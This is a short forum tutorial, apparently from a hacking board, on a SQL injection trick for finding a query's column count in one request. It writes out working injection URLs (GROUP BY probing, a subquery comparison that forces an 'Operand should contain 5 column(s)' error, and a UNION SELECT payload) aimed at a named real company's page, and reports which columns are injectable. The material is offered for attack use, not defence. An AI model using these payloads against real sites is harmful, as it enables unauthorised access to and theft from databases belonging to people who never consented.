[SQLI TRICK] find column count in one request [TUT]

first,explanation.
up to now,we got the column count with group/order by.
like this

Code:

http://www.marinaplast.com/page.php?id=13 group by 6

error 1054

Quote:(Unknown column '6' in 'group statement')

Code:

http://www.marinaplast.com/page.php?id=13 group by 5

no error.
why its happening?
behind the url /page.php?id=13 there is a sql query

PHP Code:

SELECT * FROM pages WHERE id=13 

/** if you dont know what it means,its time to learn sql.
http://www.w3schools.com/sql/default.asp **/

the union columns represent the columns in the same table.
http://www.w3schools.com/sql/sql_union.asp
for example,if the query is like this

PHP Code:

SELECT id,title,price,pic,type FROM pages WHERE id=13 

so the union will be like

PHP Code:

SELECT id,title,price,pic,type FROM pages WHERE id=13 UNION SELECT 1,2,3,4,5 

because there is 5 columns in the table pages,wich wer'e in now.

now,after we understand,lets moving on.
we now the query behind our url is

PHP Code:

SELECT * FROM pages WHERE id=13 

but we dont know how much is * (it means select all the columns in the table).
so lets count *

Code:

http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)

we set a condition,and (the main query)=(select 1)
but we didnt write the columns!
so it gives result of the columns in the table.

Code:

http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)

error 1241

Quote:(Operand should contain 5 column(s))

it means 5 columns

Code:

http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5

columns 2&3 vuln.

hope you learned something

Author ::: BEnZI

Posted in SQlbasics , SQLINJECTION